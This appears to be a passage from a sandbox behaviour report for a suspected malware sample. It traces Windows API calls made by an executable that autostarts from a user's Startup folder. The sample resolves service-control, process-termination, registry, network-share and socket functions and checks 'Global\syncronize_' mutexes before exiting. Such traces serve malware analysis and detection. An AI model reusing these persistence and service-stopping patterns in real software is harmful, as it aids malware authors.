	[0136.591] GetProcAddress (hModule=0x77080000, lpProcName="GetVersion") returned 0x77094467
	[0136.591] GetProcAddress (hModule=0x77080000, lpProcName="CreateThread") returned 0x770934d5
	[0136.591] GetProcAddress (hModule=0x77080000, lpProcName="ExpandEnvironmentStringsW") returned 0x77094173
	[0136.591] GetProcAddress (hModule=0x77080000, lpProcName="QueryPerformanceCounter") returned 0x77091725
	[0136.591] GetProcAddress (hModule=0x77080000, lpProcName="QueryPerformanceFrequency") returned 0x770941f0
	[0136.591] GetProcAddress (hModule=0x77080000, lpProcName="GetCurrentProcessId") returned 0x770911f8
	[0136.591] GetProcAddress (hModule=0x77080000, lpProcName="SetFileAttributesW") returned 0x770ad4f7
	[0136.591] GetProcAddress (hModule=0x77080000, lpProcName="GetVolumeInformationW") returned 0x770ac860
	[0136.591] GetProcAddress (hModule=0x77080000, lpProcName="WriteFile") returned 0x77091282
	[0136.591] GetProcAddress (hModule=0x77080000, lpProcName="SetFilePointerEx") returned 0x770ac807
	[0136.591] GetProcAddress (hModule=0x77080000, lpProcName="SetEndOfFile") returned 0x770ace2e
	[0136.591] GetProcAddress (hModule=0x77080000, lpProcName="FindFirstFileW") returned 0x77094435
	[0136.591] GetProcAddress (hModule=0x77080000, lpProcName="GetProcessHeap") returned 0x770914e9
	[0136.591] GetProcAddress (hModule=0x77080000, lpProcName="HeapReAlloc") returned 0x775d1f6e
	[0136.592] GetProcAddress (hModule=0x77080000, lpProcName="HeapAlloc") returned 0x775be026
	[0136.592] GetProcAddress (hModule=0x77080000, lpProcName="HeapFree") returned 0x770914c9
	[0136.592] GetProcAddress (hModule=0x77080000, lpProcName="CreatePipe") returned 0x7711415b
	[0136.592] GetProcAddress (hModule=0x77080000, lpProcName="SetHandleInformation") returned 0x770a195c
	[0136.592] GetProcAddress (hModule=0x77080000, lpProcName="CreateProcessW") returned 0x7709103d
	[0136.592] GetProcAddress (hModule=0x77080000, lpProcName="CompareStringW") returned 0x77093bca
	[0136.592] GetProcAddress (hModule=0x77080000, lpProcName="CompareStringA") returned 0x77093c5a
	[0136.592] GetProcAddress (hModule=0x77080000, lpProcName="OpenProcess") returned 0x77091986
	[0136.592] GetProcAddress (hModule=0x77080000, lpProcName="TerminateProcess") returned 0x770ad802
	[0136.592] GetProcAddress (hModule=0x77080000, lpProcName="GetSystemTime") returned 0x77095a96
	[0136.592] GetProcAddress (hModule=0x77080000, lpProcName="SystemTimeToFileTime") returned 0x77095a7e
	[0136.592] GetProcAddress (hModule=0x77080000, lpProcName="GetLastError") returned 0x770911c0
	[0136.592] GetProcAddress (hModule=0x77080000, lpProcName="CreateToolhelp32Snapshot") returned 0x770b735f
	[0136.592] GetProcAddress (hModule=0x77080000, lpProcName="Process32NextW") returned 0x770b896c
	[0136.592] GetProcAddress (hModule=0x77080000, lpProcName="Process32FirstW") returned 0x770b8baf
	[0136.592] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x75a00000
	[0136.593] GetProcAddress (hModule=0x75a00000, lpProcName="RegOpenKeyExW") returned 0x75a1468d
	[0136.593] GetProcAddress (hModule=0x75a00000, lpProcName="RegQueryValueExW") returned 0x75a146ad
	[0136.593] GetProcAddress (hModule=0x75a00000, lpProcName="RegSetValueExW") returned 0x75a114d6
	[0136.593] GetProcAddress (hModule=0x75a00000, lpProcName="RegCloseKey") returned 0x75a1469d
	[0136.593] GetProcAddress (hModule=0x75a00000, lpProcName="OpenProcessToken") returned 0x75a14304
	[0136.593] GetProcAddress (hModule=0x75a00000, lpProcName="GetTokenInformation") returned 0x75a1431c
	[0136.593] GetProcAddress (hModule=0x75a00000, lpProcName="OpenSCManagerW") returned 0x75a0ca64
	[0136.593] GetProcAddress (hModule=0x75a00000, lpProcName="OpenServiceW") returned 0x75a0ca4c
	[0136.593] GetProcAddress (hModule=0x75a00000, lpProcName="CloseServiceHandle") returned 0x75a1369c
	[0136.593] GetProcAddress (hModule=0x75a00000, lpProcName="ControlService") returned 0x75a27144
	[0136.593] GetProcAddress (hModule=0x75a00000, lpProcName="QueryServiceStatus") returned 0x75a12a86
	[0136.593] GetProcAddress (hModule=0x75a00000, lpProcName="EnumDependentServicesW") returned 0x75a01e3a
	[0136.593] GetProcAddress (hModule=0x75a00000, lpProcName="EnumServicesStatusExW") returned 0x75a0b466
	[0136.593] LoadLibraryA (lpLibFileName="user32.dll") returned 0x75760000
	[0136.594] GetProcAddress (hModule=0x75760000, lpProcName="SystemParametersInfoW") returned 0x757790d3
	[0136.594] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x760c0000
	[0136.597] GetProcAddress (hModule=0x760c0000, lpProcName="ShellExecuteExW") returned 0x760e1e46
	[0136.597] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77590000
	[0136.597] GetProcAddress (hModule=0x77590000, lpProcName="NtQuerySystemInformation") returned 0x775afda0
	[0136.597] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74f00000
	[0136.653] GetProcAddress (hModule=0x74f00000, lpProcName="WNetCloseEnum") returned 0x74f02dd6
	[0136.653] GetProcAddress (hModule=0x74f00000, lpProcName="WNetOpenEnumW") returned 0x74f02f06
	[0136.654] GetProcAddress (hModule=0x74f00000, lpProcName="WNetEnumResourceW") returned 0x74f03058
	[0136.654] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x75290000
	[0136.656] GetProcAddress (hModule=0x75290000, lpProcName="WSAStartup") returned 0x75293ab2
	[0136.656] GetProcAddress (hModule=0x75290000, lpProcName="socket") returned 0x75293eb8
	[0136.656] GetProcAddress (hModule=0x75290000, lpProcName="send") returned 0x75296f01
	[0136.656] GetProcAddress (hModule=0x75290000, lpProcName="recv") returned 0x75296b0e
	[0136.656] GetProcAddress (hModule=0x75290000, lpProcName="connect") returned 0x75296bdd
	[0136.656] GetProcAddress (hModule=0x75290000, lpProcName="closesocket") returned 0x75293918
	[0136.656] GetProcAddress (hModule=0x75290000, lpProcName="gethostbyname") returned 0x752a7673
	[0136.656] GetProcAddress (hModule=0x75290000, lpProcName="inet_addr") returned 0x7529311b
	[0136.656] GetProcAddress (hModule=0x75290000, lpProcName="ntohl") returned 0x75292d57
	[0136.656] GetProcAddress (hModule=0x75290000, lpProcName="htonl") returned 0x75292d57
	[0136.657] GetProcAddress (hModule=0x75290000, lpProcName="htons") returned 0x75292d8b
	[0136.657] GetProcessHeap () returned 0x79b0000
	[0136.657] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x0, Size=0x20) returned 0x7a1f8d0
	[0136.657] QueryPerformanceCounter (in: lpPerformanceCount=0x18f978 | out: lpPerformanceCount=0x18f978*=8191749896) returned 1
	[0136.657] GetTickCount () returned 0x1133dad
	[0136.657] GetCurrentProcessId () returned 0x5d8
	[0136.657] GetTickCount () returned 0x1133dad
	[0136.657] GetTickCount () returned 0x1133dad
	[0136.657] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x0, Size=0x20) returned 0x7a1f8f8
	[0136.657] GetVersion () returned 0x1db10106
	[0136.657] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x0, Size=0x7) returned 0x79c0940
	[0136.657] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x0, Size=0x10) returned 0x79c0da8
	[0136.657] RtlReAllocateHeap (Heap=0x79b0000, Flags=0x0, Ptr=0x79c0da8, Size=0x20) returned 0x7a1f948
	[0136.657] RtlReAllocateHeap (Heap=0x79b0000, Flags=0x0, Ptr=0x7a1f948, Size=0x40) returned 0x7a1ffb0
	[0136.657] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x0, Size=0xfffe) returned 0x7a20f50
	[0136.658] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_URN0LVA") returned 0x88
	[0136.658] HeapFree (in: hHeap=0x79b0000, dwFlags=0x0, lpMem=0x79c0940 | out: hHeap=0x79b0000) returned 1
	[0136.658] lstrlenW (lpString="Global\\syncronize_") returned 18
	[0136.658] HeapFree (in: hHeap=0x79b0000, dwFlags=0x0, lpMem=0x7a1ffb0 | out: hHeap=0x79b0000) returned 1
	[0136.658] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x0, Size=0x7) returned 0x79c0940
	[0136.658] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x0, Size=0x10) returned 0x79c0da8
	[0136.658] RtlReAllocateHeap (Heap=0x79b0000, Flags=0x0, Ptr=0x79c0da8, Size=0x20) returned 0x7a1f948
	[0136.658] RtlReAllocateHeap (Heap=0x79b0000, Flags=0x0, Ptr=0x7a1f948, Size=0x40) returned 0x7a1ffb0
	[0136.658] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x0, Size=0xfffe) returned 0x7a30f58
	[0136.658] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_URN0LVU") returned 0x8c
	[0136.658] HeapFree (in: hHeap=0x79b0000, dwFlags=0x0, lpMem=0x79c0940 | out: hHeap=0x79b0000) returned 1
	[0136.658] lstrlenW (lpString="Global\\syncronize_") returned 18
	[0136.658] HeapFree (in: hHeap=0x79b0000, dwFlags=0x0, lpMem=0x7a1ffb0 | out: hHeap=0x79b0000) returned 1
	[0136.658] GetVersion () returned 0x1db10106
	[0136.658] GetCurrentProcess () returned 0xffffffff
	[0136.658] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18f964 | out: TokenHandle=0x18f964*=0x90) returned 1
	[0136.658] GetTokenInformation (in: TokenHandle=0x90, TokenInformationClass=0x14, TokenInformation=0x18f960, TokenInformationLength=0x4, ReturnLength=0x18f96c | out: TokenInformation=0x18f960, ReturnLength=0x18f96c) returned 1
	[0136.658] CloseHandle (hObject=0x90) returned 1
	[0136.659] WaitForSingleObject (hHandle=0x8c, dwMilliseconds=0x0) returned 0x102
	[0136.659] ExitProcess (uExitCode=0x0) 
	[0136.679] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) 

Process:
	id = "8"
	image_name = "gjfkyfli;.exe"
	filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\gjfkyfli;.exe"
	page_root = "0x77f11000"
	os_pid = "0x5e0"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "autostart"
	parent_id = "0"
	os_parent_pid = "0x0"
	cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe\" "
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ecd5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 44
	os_tid = 0x5e4

	[0122.657] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x2ac33b00, dwHighDateTime=0x1d58eee)) 
	[0122.657] GetCurrentThreadId () returned 0x5e4
	[0122.657] GetCurrentProcessId () returned 0x5e0
	[0122.657] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=6791814378) returned 1
	[0122.658] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x775afd35, hStdError=0x77617daf)) 
	[0122.658] GetProcessHeap () returned 0x7ab0000
	[0122.659] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0122.660] GetProcAddress (hModule=0x77080000, lpProcName=0x411d04) returned 0x77094f2b
	[0122.661] GetProcAddress (hModule=0x77080000, lpProcName="FlsFree") returned 0x7709359f
	[0122.661] GetProcAddress (hModule=0x77080000, lpProcName="FlsGetValue") returned 0x77091252
	[0122.661] GetProcAddress (hModule=0x77080000, lpProcName="FlsSetValue") returned 0x77094208
	[0122.661] GetProcAddress (hModule=0x77080000, lpProcName="InitializeCriticalSectionEx") returned 0x77094d28
	[0122.661] GetProcAddress (hModule=0x77080000, lpProcName="CreateEventExW") returned 0x7711410b
	[0122.661] GetProcAddress (hModule=0x77080000, lpProcName="CreateSemaphoreExW") returned 0x77114195
	[0122.661] GetProcAddress (hModule=0x77080000, lpProcName="SetThreadStackGuarantee") returned 0x7709d31f
	[0122.661] GetProcAddress (hModule=0x77080000, lpProcName="CreateThreadpoolTimer") returned 0x770aee7e
	[0122.661] GetProcAddress (hModule=0x77080000, lpProcName="SetThreadpoolTimer") returned 0x775d441c
	[0122.661] GetProcAddress (hModule=0x77080000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x775fc50e
	[0122.661] GetProcAddress (hModule=0x77080000, lpProcName="CloseThreadpoolTimer") returned 0x775fc381
	[0122.661] GetProcAddress (hModule=0x77080000, lpProcName="CreateThreadpoolWait") returned 0x770af088
	[0122.661] GetProcAddress (hModule=0x77080000, lpProcName="SetThreadpoolWait") returned 0x775e05d7
	[0122.661] GetProcAddress (hModule=0x77080000, lpProcName="CloseThreadpoolWait") returned 0x775fca24
	[0122.662] GetProcAddress (hModule=0x77080000, lpProcName="FlushProcessWriteBuffers") returned 0x775b0b8c
	[0122.662] GetProcAddress (hModule=0x77080000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7766fde8
	[0122.662] GetProcAddress (hModule=0x77080000, lpProcName="GetCurrentProcessorNumber") returned 0x77601e1d
	[0122.662] GetProcAddress (hModule=0x77080000, lpProcName="GetLogicalProcessorInformation") returned 0x77114761
	[0122.662] GetProcAddress (hModule=0x77080000, lpProcName="CreateSymbolicLinkW") returned 0x7710cd11
	[0122.662] GetProcAddress (hModule=0x77080000, lpProcName="SetDefaultDllDirectories") returned 0x0
	[0122.662] GetProcAddress (hModule=0x77080000, lpProcName="EnumSystemLocalesEx") returned 0x7711424f
	[0122.662] GetProcAddress (hModule=0x77080000, lpProcName="CompareStringEx") returned 0x771146b1
	[0122.662] GetProcAddress (hModule=0x77080000, lpProcName="GetDateFormatEx") returned 0x77126676
	[0122.662] GetProcAddress (hModule=0x77080000, lpProcName="GetLocaleInfoEx") returned 0x77114751
	[0122.662] GetProcAddress (hModule=0x77080000, lpProcName="GetTimeFormatEx") returned 0x771265f1
	[0122.662] GetProcAddress (hModule=0x77080000, lpProcName="GetUserDefaultLocaleName") returned 0x771147c1
	[0122.662] GetProcAddress (hModule=0x77080000, lpProcName="IsValidLocaleName") returned 0x771147e1
	[0122.662] GetProcAddress (hModule=0x77080000, lpProcName="LCMapStringEx") returned 0x771147f1
	[0122.662] GetProcAddress (hModule=0x77080000, lpProcName="GetCurrentPackageId") returned 0x0
	[0122.663] GetProcAddress (hModule=0x77080000, lpProcName="GetTickCount64") returned 0x770aeee0
	[0122.663] GetProcAddress (hModule=0x77080000, lpProcName="GetFileInformationByHandleExW") returned 0x0
	[0122.663] GetProcAddress (hModule=0x77080000, lpProcName="SetFileInformationByHandleW") returned 0x0
	[0122.663] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x3bc) returned 0x7ac1f00
	[0122.663] GetCurrentThreadId () returned 0x5e4
	[0122.663] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x18) returned 0x7abebc8
	[0122.663] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x800) returned 0x7ac22c8
	[0122.663] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4054f2, hStdOutput=0xbfc469bd, hStdError=0x0)) 
	[0122.663] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
	[0122.664] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
	[0122.664] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
	[0122.664] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe\" "
	[0122.664] GetEnvironmentStringsW () returned 0x7ac2ad0*
	[0122.664] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xb02) returned 0x7ac35e0
	[0122.665] FreeEnvironmentStringsW (penv=0x7ac2ad0) returned 1
	[0122.665] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4396b0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\gjfkyfli;.exe")) returned 0x69
	[0122.665] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xdc) returned 0x7ac2ad0
	[0122.680] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x9c) returned 0x7ac2bb8
	[0122.680] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x3e) returned 0x7ac2c60
	[0122.680] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x6c) returned 0x7ac2ca8
	[0122.680] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x6e) returned 0x7ac2d20
	[0122.680] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x78) returned 0x7ac2d98
	[0122.680] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x62) returned 0x7ac2e18
	[0122.680] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x2e) returned 0x7ac0a80
	[0122.680] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x48) returned 0x7ac2e88
	[0122.680] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x28) returned 0x7ac2ed8
	[0122.680] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x1a) returned 0x7ac1858
	[0122.680] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x4a) returned 0x7ac2f08
	[0122.680] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x72) returned 0x7ac4108
	[0122.680] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x30) returned 0x7ac2f60
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x2e) returned 0x7ac2f98
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x1c) returned 0x7ac1880
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0xd2) returned 0x7ac2fd0
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x7c) returned 0x7ac30b0
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x36) returned 0x7ac3138
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x3a) returned 0x7ac3178
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x90) returned 0x7ac31c0
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x24) returned 0x7ac3258
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x30) returned 0x7ac3288
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x36) returned 0x7ac32c0
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x48) returned 0x7ac3300
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x52) returned 0x7ac3350
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x3c) returned 0x7ac33b0
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x82) returned 0x7ac33f8
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x2e) returned 0x7ac3488
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x28) returned 0x7ac34c0
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x1e) returned 0x7ac18a8
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x2c) returned 0x7ac34f0
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x54) returned 0x7ac3528
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x52) returned 0x7ac60f0
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x2a) returned 0x7ac3588
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x3c) returned 0x7ac6150
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x54) returned 0x7ac6198
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x24) returned 0x7ac61f8
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x30) returned 0x7ac6228
	[0122.681] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x8c) returned 0x7ac6260
	[0122.681] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7ac35e0 | out: hHeap=0x7ab0000) returned 1
	[0122.682] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x80) returned 0x7ac35c0
	[0122.682] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0122.682] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x8, Size=0x800) returned 0x7ac3648
	[0122.682] GetLastError () returned 0x0
	[0122.682] SetLastError (dwErrCode=0x0) 
	[0122.682] GetLastError () returned 0x0
	[0122.682] SetLastError (dwErrCode=0x0) 
	[0122.682] GetLastError () returned 0x0
	[0122.682] SetLastError (dwErrCode=0x0) 
	[0122.682] GetACP () returned 0x4e4
	[0122.682] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x220) returned 0x7ac3e50
	[0122.682] GetLastError () returned 0x0
	[0122.682] SetLastError (dwErrCode=0x0) 
	[0122.682] IsValidCodePage (CodePage=0x4e4) returned 1
	[0122.682] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1
	[0122.683] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1
	[0122.683] GetLastError () returned 0x0
	[0122.683] SetLastError (dwErrCode=0x0) 
	[0122.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0122.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0122.683] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1
	[0122.683] GetLastError () returned 0x0
	[0122.683] SetLastError (dwErrCode=0x0) 
	[0122.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0122.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0122.688] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
